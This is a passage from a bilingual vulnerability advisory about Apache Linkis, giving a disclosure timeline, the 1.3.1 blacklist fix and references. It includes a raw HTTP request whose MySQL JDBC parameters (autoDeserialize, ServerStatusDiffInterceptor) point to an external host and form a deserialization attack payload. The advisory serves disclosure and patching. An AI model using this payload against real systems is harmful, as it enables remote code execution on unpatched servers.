nguage: en Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://10.211.55.6:8088 Referer: http://10.211.55.6:8088/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8 Cookie: linkis_user_session_ticket_id_v1=3cSULn63z6BRzonTuKWkmSAyp90ueJCH Connection: close {"id":1,"dataSourceName":"test","dataSourceTypeId":1,"createSystem":"Linkis","connectParams":{"password":"RoOt123.","databaseName":"test","port":"3306","host":”149.**.**.150","driverClassName":"com.mysql.jdbc.Driver","params":"{\"connectionAttributes\":\"t:cb194\",\"autoDeserialize\":\"true\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"useSSL\":\"false\"}","username":"root"},"createTime":1667210719000,"modifyTime":1667210718000,"createUser":"root","versionId":1,"expire":false,"dataSourceType":{"name":"mysql","layers":0}} 修复 1.3.1 version add blacklist / 1.3.1版本添加黑名单 linkis-commons/linkis-common/src/main/java/org/apache/linkis/common/utils/SecurityUtils.java https://github.com/apache/linkis/commit/a652276961e39a6e0d6f79698e2b082a72f160d1#diff-d9f1daccf16be38b1c2a2b946ea9e8b27f5d7713b3981afef222ffe00e3b4a67 时间线 2022-11-02 Reporter to apache / 2022-11-02 向apache报告 2022-12-10 Fix the issue / 2022-12-10 修复 2023-01-19 Release apache linkis 1.3.1 version / 2023-01-19 发布apache linkis 1.3.1版本 2023-01-31 Public cve email / 2023-01-31 公开cve邮件 许多公司已经用 Linkis 来解决大数据平台连通、扩展、管控、编排等计算治理问题;涉及金融、电信、制造、互联网等多个行业。其安全性需要各Web3项目方提高重视,及时关注各种Web3基础架构的安全漏洞并及时打好补丁,以避免潜在的安全风险和数字资产损失。我们将及时挖掘,追踪各种web3上的安全风险,以及提供领先的安全解决方案,确保web3世界链上,链下安全无虞。 参考 https://lists.apache.org/thread/zlcfmvt65blqc4n6fxypg6f0ns8fqfz4 https://github.com/apache/linkis/issues/23 来源:金色财经lg...